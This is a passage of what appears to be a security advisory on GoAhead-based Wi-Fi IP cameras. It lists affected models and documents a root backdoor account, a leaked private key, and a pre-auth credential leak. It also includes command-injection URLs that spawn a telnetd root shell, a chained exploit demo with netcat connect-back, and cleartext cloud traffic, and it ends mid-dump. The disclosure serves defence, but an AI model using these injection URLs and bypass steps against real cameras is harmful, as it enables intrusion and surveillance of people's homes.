SWADS-440IPC-AU\r\nSygonix 43176A\r\nSygonix 43558A\r\nSzneo CAM0X\r\nSzneo CoolCam\r\nSzneo NIP\r\nSzneo NIP-0\r\nSzneo NIP-02\r\nSzneo NIP-031\r\nSzneo NIP-031H\r\nSzneo NIP-06\r\nSzneo NIP-12\r\nSzneo NIP-2\r\nSzneo NIP-20\r\nSzneo NIP-210485-ABABC\r\nSzneo NIP-26\r\nSzneo NIP-X\r\nSzneo NP-254095\r\nSzneo Other\r\nSzneo TFD\r\nTAS-Tech Other\r\nTechnaxx tx-23\r\nTechview GM8126\r\nTechview QC-3638\r\nTechview qc3839\r\nTemvis Other\r\nTenda C50S\r\nTenda c30\r\nTenda c5+\r\nTenvis 0012\r\nTenvis 3815\r\nTenvis 3815-W\r\nTenvis 3815W\r\nTenvis 3815W.\r\nTenvis 3815W2013\r\nTenvis IP-319W\r\nTenvis IP-319w\r\nTenvis IP-391W\r\nTenvis IP-391WHD\r\nTenvis IP-602W\r\nTenvis IP602W\r\nTenvis IPROBOT\r\nTenvis JP-3815W\r\nTenvis JPT-3814WP2P\r\nTenvis JPT-3815\r\nTenvis JPT-3815-P2P\r\nTenvis JPT-3815W\r\nTenvis JPT-3815W+\r\nTenvis JPT-3815WP2P\r\nTenvis JPT-3815w\r\nTenvis JPT-3818\r\nTenvis MINI-319W\r\nTenvis Mini-319\r\nTenvis Other\r\nTenvis PT-7131W\r\nTenvis TH-661\r\nTenvis TR-3818\r\nTenvis TR-3828\r\nTenvis TR3815W\r\nTenvis TZ100\r\nTenvis TZ100/IPROBOT3\r\nTenvus JPG3815W\r\nThreeboy IP-660\r\nTopcam SL-30IPC01Z\r\nTopcam SL-720IPC02Z\r\nTopcam SL-910IW30\r\nTopica+CCTV Other\r\nTrivision NC-335PW-HD-10\r\nTrust NW-7500\r\nTurbo+X Endurance\r\nTurbo+X IIPC-20\r\nUokoo 720P\r\nVCatch Other\r\nVCatch VC-MIC720HK\r\nValtronics IP\r\nValtronics Other\r\nVandesc IP900\r\nVantech Other\r\nVantech PTZ\r\nVideosec+Security IPC-103\r\nVideosec+Security IPP-105\r\nVimicro Other\r\nVitek+CCTV Other\r\nVstarcam 7823\r\nVstarcam C-7824WIP\r\nVstarcam C-7833WIP-X4\r\nVstarcam C-7833wip\r\nVstarcam C-7837WIP\r\nVstarcam C-7838WIP\r\nVstarcam C50S\r\nVstarcam C7816W\r\nVstarcam C7824WIP\r\nVstarcam C782WIP\r\nVstarcam C7842WIP\r\nVstarcam C93\r\nVstarcam C=7824WIP\r\nVstarcam Cam360\r\nVstarcam F-6836W\r\nVstarcam H-6837WI\r\nVstarcam H-6837WIP\r\nVstarcam H-6850\r\nVstarcam H-6850WIP\r\nVstarcam H-6850wip\r\nVstarcam ICAM-608\r\nVstarcam Other\r\nVstarcam T-6835WIP\r\nVstarcam T-6836WTP\r\nVstarcam T-6892wp\r\nVstarcam T-7815WIP\r\nVstarcam T-7833WIP\r\nVstarcam T-7833wip\r\nVstarcam T-7837WIP\r\nVstarcam T-7838WIP\r\nVstarcam T-7892WIP\r\nVstarcam T6836WTP\r\nVstarcam T7837WIP\r\nVstarcam c7815wip\r\nVstarcam c7833wip\r\nVstarcam c7850wip\r\nWanscam 00D6FB01980F\r\nWanscam 106B\r\nWanscam 118\r\nWanscam 541-W\r\nWanscam 543-W\r\nWanscam 790\r\nWanscam AJ-C0WA-198\r\nWanscam AJ-C0WA-B106\r\nWanscam AJ-C0WA-B116\r\nWanscam AJ-C0WA-B168\r\nWanscam AJ-C0WA-B1D8\r\nWanscam AJ-C0WA-C0D8\r\nWanscam AJ-C0WA-C116\r\nWanscam AJ-C0WA-C126\r\nWanscam AJ-C2WA-B118\r\nWanscam AJ-C2WA-C116\r\nWanscam AJ-C2WA-C118\r\nWanscam AJ-C2WA-C198\r\nWanscam AJ-COWA-B1D8\r\nWanscam AJ-COWA-C116\r\nWanscam AJ-COWA-C126\r\nWanscam AJ-COWA-C128\r\nWanscam AW00004J\r\nWanscam B1D8-1\r\nWanscam C-118\r\nWanscam C-126\r\nWanscam Colour\r\nWanscam FI-18904w\r\nWanscam FR-4020A2\r\nWanscam FR4020A2\r\nWanscam HD-100W\r\nWanscam HW-0021\r\nWanscam HW-0022\r\nWanscam HW-0022HD\r\nWanscam HW-0023\r\nWanscam HW-0024\r\nWanscam HW-0025\r\nWanscam HW-0026\r\nWanscam HW-0028\r\nWanscam HW-0033\r\nWanscam HW-0036\r\nWanscam HW-0038\r\nWanscam HW-0039\r\nWanscam HW-22\r\nWanscam HW0030\r\nWanscam IP\r\nWanscam JW-0001\r\nWanscam JW-0003\r\nWanscam JW-0004\r\nWanscam JW-0004m\r\nWanscam JW-0005\r\nWanscam JW-0006\r\nWanscam JW-0008\r\nWanscam JW-0009\r\nWanscam JW-0010\r\nWanscam JW-0011\r\nWanscam JW-0011l\r\nWanscam JW-0012\r\nWanscam JW-0018\r\nWanscam JW-004\r\nWanscam JW-009\r\nWanscam JW-CD\r\nWanscam JW000008\r\nWanscam JW0009\r\nWanscam JW001\r\nWanscam JW0012\r\nWanscam JW008\r\nWanscam JWEV\r\nWanscam JWEV-011777-NSRVV\r\nWanscam JWEV-011921-RXSXT\r\nWanscam JWEV-360171-BBEAC\r\nWanscam JWEV-380096-CECDB\r\nWanscam JWEV-PEPLOW\r\nWanscam NBC-543W\r\nWanscam NC-530\r\nWanscam NC-541\r\nWanscam NC-541/W\r\nWanscam NC-541W\r\nWanscam NC-541w\r\nWanscam NC-543W\r\nWanscam NCB-534W\r\nWanscam NCB-540W\r\nWanscam NCB-541W\r\nWanscam NCB-541WB\r\nWanscam NCB-543W\r\nWanscam NCBL-618W\r\nWanscam NCH-532MW\r\nWanscam NCL-610W\r\nWanscam NCL-612W\r\nWanscam NCL-616W\r\nWanscam NCL-S616W\r\nWanscam Other\r\nWanscam TG-002\r\nWanscam WJ-0004\r\nWanscam WX-617\r\nWanscam Works\r\nWanscam XHA-120903181\r\nWanscam XHA-4020a2\r\nWanscam __PTZ\r\nWanscam chiOthernese\r\nWanscam ip\r\nWanscam jw0005\r\nWanscam jw0010\r\nWansview 541\r\nWansview 625W\r\nWansview MCM-627\r\nWansview N540w\r\nWansview NCB-534W\r\nWansview NCB-541W\r\nWansview NCB-541w\r\nWansview NCB-543W\r\nWansview NCB541W\r\nWansview NCB545W\r\nWansview NCL-610W\r\nWansview NCL610D04\r\nWansview NCL614W\r\nWansview Other\r\nWansview dcs543w\r\nWansview nc543w\r\nWardmay+CCTV WDM-6702AL\r\nWatch+bot+Camera resup\r\nWebcamXP Other\r\nWinBook Other\r\nWinBook T-6835\r\nWinBook T-6835WIP\r\nWinBook T-7838\r\nWinic NVT-530004\r\nWise+Group Other\r\nX-Price Other\r\nX10 39A\r\nX10 AIRSIGHT\r\nX10 AirSight\r\nX10 Airsight\r\nX10 Jake\r\nX10 Other\r\nX10 XC-38A\r\nX10 XX-36A\r\nX10 XX-39A\r\nX10 XX-56A\r\nX10 XX-59A\r\nX10 XX-60\r\nX10 XX-69A\r\nX10 XX41Ahome\r\nXVision Other\r\nXXCamera 53100\r\nXXCamera 5330-E\r\nXXCamera Other\r\nXXCamera XXC-000723-NJFJD\r\nXXCamera XXC-092411-DCAFC\r\nXXCamera XXC-50100-H\r\nXXCamera XXC-50100-T\r\nXXCamera XXC-5030-E\r\nXXCamera XXC-53100-T\r\nXXCamera XXC52130\r\nXin+Ling Other\r\nYawcam Other\r\nZilink Other\r\nZmodo CMI-11123BK\r\nZmodo IP-900\r\nZmodo Other\r\nZodiac+Security 909\r\nZodiac+Security Other\r\nZoneway NC638MW-P\r\nZyXEL Other\r\nalexim Other\r\nalexim cam22822\r\nalias Other\r\nall+in+one+ Other\r\nall+in+one+ b1\r\nall-in-one Other\r\nallecto DVC-150IP\r\napc Other\r\nasw-006 Other\r\nboh l\r\nbravo Other\r\nbush+plus BU-300WF\r\nccam p2p\r\nchina 8904W\r\nchina HDIPCAM\r\nchina IPCAM\r\nchina Other\r\nchina PTZCAM\r\nchina np-02\r\nciana+exports antani\r\ncina Other\r\ncoolead L\r\ncoolead L610WS\r\ndax Other\r\ndenver IPC-320\r\ndenver IPO-320\r\ne-landing 720p\r\neScam QF100\r\nebw Other\r\nepexis PIPCAMHD82\r\nepexis pipcam5\r\nesecure nvp\r\ngeeya C602\r\ngeeya P2P\r\ngeeya c801\r\nhdcam Other\r\nhomeguard 720P\r\nhomeguard Other\r\nhomeguard Wireless\r\nhomeguard wifi\r\niView ID002A\r\niView Other\r\ninsteon 75790\r\ninsteon 75790wh\r\ninsteon High\r\ninsteon Other\r\ninsteon Wireless\r\niuk 5A1\r\nivision hdwificam\r\niwitness bullet\r\njwt Other\r\njyacam JYA8010\r\nkadymay KDM-6800\r\nkadymay KDM6702\r\nkadymay KMD-6800\r\nkadymay Other\r\nkang+xun xxc5030-t\r\nkines Other\r\nkiocong 1601\r\nkiocong 1602\r\nkiocong 1609\r\nkiocong Other\r\nkodak 201pl\r\nkoicong 1601\r\nl+series CAM0758\r\nl+series CAM0760\r\nl+series Other\r\nl+series V100\r\nlogan n8504hh\r\nmeyetech 095475-caeca\r\nmeyetech 188091-EFBAE\r\nmeyetech Other\r\nmeyetech WirelessCam\r\nmicasaverde VistaCamSD\r\npipcam HD17\r\npni 941w\r\npni IP451W\r\npni IP541W\r\npni IP941W\r\npni IP951W\r\npni Other\r\npnp IP\r\npnp Other\r\nsemac Other\r\nskylink WC-300PS\r\nstorex D-10H\r\n\r\n```\r\n\r\n[Shodan lists 185 000 vulnerable cameras](https://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41).\r\n\r\n<a id=\"backdoor-account\"></a>\r\n\r\n## Details - Backdoor account\r\n\r\nBy default, telnetd is running on the camera.\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\napk-link login: admin\r\nPassword:\r\n\r\ntelnet> q\r\nConnection closed.\r\nuser@kali$\r\n\r\n```\r\n\r\nOne backdoor account exists in the camera:\r\n\r\n```\r\nroot:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh\r\n\r\n```\r\n\r\n\r\n\r\n## Details - RSA key and certificates\r\n\r\nThe `/system/www/pem/ck.pem` contains an Apple certificate with a private RSA key:\r\n\r\n```\r\n/ # cat /system/www/pem/ck.pem \r\nBag Attributes\r\n friendlyName: Apple Production IOS Push Services: com.app.camera\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nsubject=/UID=com.app.camera/CN=Apple Production IOS Push Services: com.app.camera/OU=SQ6NNPBE2K/C=US\r\nissuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer Relations/CN=Apple Worldwide Developer Relations Certification Authority\r\n-----BEGIN CERTIFICATE-----\r\n[...]\r\n-----END CERTIFICATE-----\r\nBag Attributes\r\n friendlyName: andrew\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nKey Attributes: <No Attributes>\r\n-----BEGIN RSA PRIVATE KEY-----\r\n[...]\r\n-----END RSA PRIVATE KEY-----\r\n\r\n```\r\n\r\n<a id=\"pre-auth-info-leak-goahead\"></a>\r\n\r\n## Details - Pre-Auth Info Leak (credentials) within the GoAhead http server\r\n\r\nThe HTTP interface is provided by GoAhead. It allows 2 kinds of authentication:\r\n\r\n* htdigest authentication OR\r\n* authentication using credentials in URI (`?loginuse=LOGIN&?loginpas=PASS`).\r\n\r\nBy default, the web directory contains symbolic links to configuration files (`system.ini` and `system-b.ini` contain credentials):\r\n\r\n```\r\n/tmp/web # ls -la *ini\r\nlrwxrwxrwx 1 root 0 25 Oct 27 02:11 factory.ini -> /system/param/factory.ini\r\nlrwxrwxrwx 1 root 0 30 Oct 27 02:11 factoryparam.ini -> /system/param/factoryparam.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 network-b.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 network.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system-b.ini -> /system/www/system.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system.ini -> /system/www/system.ini\r\n/tmp/web #\r\n\r\n```\r\n\r\nWith valid credentials, an attacker can retrieve the configuration, as shown below:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd\r\n\r\n[...]\r\n000001d0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000200: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158 ............{o.X\r\n00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973 ........time.nis\r\n00000230: 742e 676f 7600 0000 0000 0000 0000 0000 t.gov...........\r\n00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000640: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000650: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000660: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000680: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000 ................\r\n[...]\r\nuser@kali$\r\n\r\n```\r\n\r\nTo browse `.cgi` files, an attacker needs to authenticate too:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS'\r\nvar result=\"Auth Failed\";\r\nuser@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas'\r\nvar result=\"Auth Failed\";\r\n\r\n```\r\n\r\nBut it appears access to `.ini` files are not correctly checked. The attacker can bypass the authentication by providing an empty `loginuse` and an empty `loginpas` in the URI:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less\r\n00000000: 5749 4649 4341 4d00 0000 0000 0000 0000 WIFICAM.........\r\n00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000020: 0000 0100 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........\r\n[...]\r\n\r\n```\r\n\r\nA PoC is provided:\r\n\r\n```\r\n./expl 192.168.1.107 --get-config | xxd | grep 000003\r\n\r\n00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373 mSec..[+] bypass\r\n00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a ................\r\n00000320: 0100 0000 0a03 0100 0000 0000 0000 0000 ................\r\n00000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.\r\n000003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003c0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.\r\n000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000 ................\r\n000003f0: 0000 0101 0003 0002 0000 0080 8080 8001 ................\r\n\r\n```\r\n\r\nThis vulnerability allows an attacker to steal credentials, ftp accounts and smtp accounts (email).\r\n\r\n<a id=\"root-rce\"></a>\r\n\r\n## Details - Authenticated RCE as root\r\n\r\nA RCE exists in the ftp configuration CGI. This is well-documented as shown [here](https://jumpespjump.blogspot.de/2015/09/how-i-hacked-my-ip-camera-and-found.html) and [here](https://www.pentestpartners.com/blog/hacking-the-aldi-ip-cctv-camera-part-2/) in several different camera models.\r\n\r\nThe partition `/` is mounted in Read-Only, so modifications are not possible in this partition.\r\n\r\nThe command injection is located in in `set_ftp.cgi` (see `$(ftp x.com)`):\r\n\r\n```\r\nhttp://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp x.com)ftp&dir=/&mode=PORT&upload_interval=0\r\nhttp://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin\r\n\r\n```\r\n\r\nWhen doing a tcpdump, we can see the DNS resolution for x.com:\r\n\r\n```\r\n00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com. (23)\r\n\r\n```\r\n\r\nso, `ftp x.com` is executed.\r\n\r\nWe can use the telnetd binary to start an authenticated-less telnetd access:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'\r\nuser@kali$ wget -qO- 'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'\r\n\r\n```\r\n\r\nTesting this will give us root account on port 25/tcp:\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107 25\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\n/ # id\r\nuid=0(root) gid=0\r\n/ # uname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\n/ # mount\r\nrootfs on / type rootfs (rw)\r\n/dev/root on / type squashfs (ro,relatime)\r\n/proc on /proc type proc (rw,relatime)\r\nsysfs on /sys type sysfs (rw,relatime)\r\ntmpfs on /dev type tmpfs (rw,relatime,size=2048k)\r\ntmpfs on /tmp type tmpfs (rw,relatime,size=5120k)\r\ndevpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)\r\n/dev/mtdblock3 on /system type jffs2 (rw,relatime)\r\n/ #\r\n\r\n```\r\n\r\n`/etc` is in read-only. So, command injection must not write into `/etc`. The injection is located in `/tmp/ftpupload.sh`:\r\n\r\n```\r\n/ # cat /tmp/ftpupload.sh \r\n/bin/ftp -n<<!\r\nopen 192.168.1.1 21\r\nuser ftp $(telnetd -l /bin/sh -p 25)ftp\r\nbinary\r\nlcd /tmp\r\nput ftptest.txt\r\nclose\r\nbye\r\n!\r\n/ #\r\n\r\n```\r\n\r\n<a id=\"pre-auth-root-rce\"></a>\r\n\r\n## Details - Pre-Auth RCE as root\r\n\r\nBy combining the Pre-Auth Info Leak within the GoAhead http server vulnerability and then authenticated RCE as root, an attacker can achieve a pre-auth RCE as root on a LAN or on the Internet.\r\n\r\nAn exploit is provided and can be used to get a root RCE with connect-back.\r\n\r\nThe exploit will:\r\n\r\n1. extract the valid credentials by connecting to the remote GoAhead HTTP server of the targeted camera\r\n2. plant a connect-back with `nc`\r\n3. execute the payload\r\n4. the attacker will receive a root shell with netcat on a second terminal\r\n5. clean the payload located in the configuration file\r\n\r\nIt affects 1250+ camera models.\r\n\r\nDemo:\r\n\r\n```\r\nuser@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl 192.168.1.107 \r\nCamera 0day root RCE with connect-back @PierreKimSec\r\n\r\nPlease run `nc -vlp 1337` on 192.168.1.1\r\n\r\n[+] bypassing auth ... done\r\n login = admin\r\n pass = admin\r\n[+] planting payload ... done\r\n[+] executing payload ... done\r\n[+] cleaning payload ... done\r\n[+] cleaning payload ... done\r\n[+] enjoy your root shell on 192.168.1.1:1337\r\nuser@kali$\r\n\r\n```\r\n\r\nOn the second xterm:\r\n\r\n```\r\nuser@kali$ nc -lvp 1337\r\nlistening on [any] 1337 ...\r\n192.168.1.107: inverse host lookup failed: Unknown host\r\nconnect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968\r\nid\r\nuid=0(root) gid=0\r\nuname -ap\r\nLinux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux\r\nps \r\nPID USER TIME COMMAND\r\n 1 root 0:01 {linuxrc} init\r\n 2 root 0:00 [kthreadd]\r\n 3 root 0:00 [ksoftirqd/0]\r\n 5 root 0:00 [kworker/0:0H]\r\n 6 root 0:00 [kworker/u2:0]\r\n 7 root 0:00 [rcu_preempt]\r\n 8 root 0:00 [rcu_bh]\r\n 9 root 0:00 [rcu_sched]\r\n 10 root 0:00 [watchdog/0]\r\n 11 root 0:00 [khelper]\r\n 12 root 0:00 [writeback]\r\n 13 root 0:00 [bioset]\r\n 14 root 0:00 [kblockd]\r\n 15 root 0:00 [khubd]\r\n 16 root 0:00 [kworker/0:1]\r\n 17 root 0:00 [cfg80211]\r\n 18 root 0:00 [rpciod]\r\n 19 root 0:00 [kswapd0]\r\n 20 root 0:00 [fsnotify_mark]\r\n 21 root 0:00 [nfsiod]\r\n 22 root 0:00 [crypto]\r\n 36 root 0:00 [kworker/u2:1]\r\n 39 root 0:00 [i2s_work_1]\r\n 40 root 0:00 [i2s_codec_irq_w]\r\n 41 root 0:00 [kworker/0:2]\r\n 42 root 0:00 [deferwq]\r\n 43 root 0:00 [kworker/0:1H]\r\n 59 root 0:00 [jffs2_gcd_mtd3]\r\n 61 root 0:00 telnetd\r\n 69 root 0:00 /system/system/bin/wifidaemon\r\n 70 root 0:00 /sbin/getty -L ttyS1 115200 vt100\r\n 98 root 0:01 [RtmpTimerTask]\r\n 99 root 0:00 [RtmpMlmeTask]\r\n 100 root 0:00 [RtmpCmdQTask]\r\n 101 root 0:00 [RtmpWscTask]\r\n 148 root 1:19 /tmp/encoder\r\n 164 root 0:00 [irq/37-isp]\r\n 236 root 0:07 [apical_isp_fw_p]\r\n 2330 root 0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt\r\n 2331 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2332 root 0:00 {exe} ash /tmp/ftpupload.sh\r\n 2333 root 0:00 /bin/ftp -n\r\n 2334 root 0:00 /bin/sh\r\n 2439 root 0:00 ps\r\n\r\n```\r\n\r\nDetails -- Misc - \"Cloud\" (Aka Botnet)\r\nBy default, the camera uses a 'Cloud' functionality.\r\n\r\nYou can tcpdump the traffic of the camera, which is very scary:\r\n```\r\n12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+ A? openapi.xg.qq.com.gateway. (43)\r\n12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)\r\n12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)\r\n12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:06.575735 ARP, Request who-has 192.168.1.1 tell 192.168.1.107, length 46\r\n12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28\r\n12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)\r\n12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+ A? time.nist.gov. (31)\r\n12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48\r\n12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48\r\n12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48\r\n12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)\r\n```\r\n\r\nThe camera tries to resolve `www.baidu.com`, `openapi.xg.qq.com`, contacts hardcoded IPs and hosts:\r\n\r\n* `121.42.208.86:32100/udp` (CN: Alibaba),\r\n* `54.221.213.97:32100/udp` (AWS US),\r\n* `120.24.37.48:32100/udp` (CN: Alibaba),\r\n* `www.baidu.com:80/tcp` (CN: Baidu).\r\n\r\nIt appears this is the 'Cloud' functionality, enabled by default. The security of this functionality is not proven.\r\n\r\nThe provided Android application to manage my camera is [object.p2pwificam.client.apk](https://play.google.com/store/apps/details?id=object.p2pwificam.client).\r\n\r\n![](https://images.seebug.org/content/images/2017/03/2017-cam-p2pwificam-0.png)\r\n\r\n![](https://images.seebug.org/content/images/2017/03/2017-cam-p2pwificam-1.png)\r\n\r\nNetcam 360 works too:\r\n\r\n![](https://images.seebug.org/content/images/2017/03/2017-cam-netcam.png)\r\n\r\nIt appears, the network protocol is very weak:\r\n\r\n1. the camera contacts a remote server using UDP,\r\n2. the application contacts a remote server using UDP,\r\n3. the application sends a request to the remote server, asking if the camera with the specific serial-number is online,\r\n4. the server will reply by \"camera doesn't exit\", \"camera is offline\" or \"camera is online\",\r\n5. if the camera is online, a UDP tunnel is automaticaly established between the application and the camera, using the Cloud server as a relay.\r\n\r\n### UDP tunnel:\r\n\r\n```\r\n[Android Application] <===UDP===> Cloud server <===UDP===> [Camera]\r\n\r\n```\r\n\r\nThen, the UDP tunnel is used by the application to reach the camera:\r\n\r\n1/ the client will send a HTTP request to the camera with the credentials (still in clear-text)\r\n\r\n```\r\nGET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nor\r\n\r\n```\r\nGET /check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\n2/ the camera will reply by using HTTP over UDP whenever the credentials are valid or invalid.\r\n\r\nIf the credentials are valid, the camera will reply:\r\n\r\n```\r\nresult= 0;\r\n\r\n```\r\n\r\nIf the credentials are not valid, the camera will reply:\r\n\r\n```\r\nresult=-1\r\n\r\n```\r\n\r\n3/ if the credentials are valid, then the application will send HTTP requests to .cgi files hosted by the camera by appending credentials to the requests (`?loginuse=valid_user&loginpas=valid_pass`)\r\n\r\n### Step 2 in detail:\r\n\r\nIf the authentication is OK, so it is alright to dump all the configuration in cleartext!\r\n\r\n![](https://images.seebug.org/content/images/2017/03/2017-cam-cloud-auth-ok.png)\r\n\r\nNote: this trace was done with one of the application listed below, to be sure applications are sharing the same \"cloud\" network (it appears the daemon running on the camera doesn't strictly respect the HTTP protocol - note the lack of `/` - but it works !).\r\n\r\nIf the authentication is not OK. The cameras answers:\r\n\r\n```\r\nresult=-1;\r\n\r\n```\r\n\r\nDue to the absence of checking, an attacker can simply bruteforce credentials.\r\n\r\n![](https://images.seebug.org/content/images/2017/03/2017-cam-cloud-auth-fail.png)\r\n\r\n### Step 3 in detail:\r\n\r\nThe application sends:\r\n\r\n```\r\nGET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nOR\r\n\r\n```\r\nGET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&\r\n\r\n```\r\n\r\nThe camera replies by sending all its configuration in clear-text:\r\n\r\n```\r\nvar now=1122211111;\r\nvar dst_enable=0;\r\nvar dst_time=0;\r\nvar tz=0;\r\nvar ntp_enable=1;\r\nvar 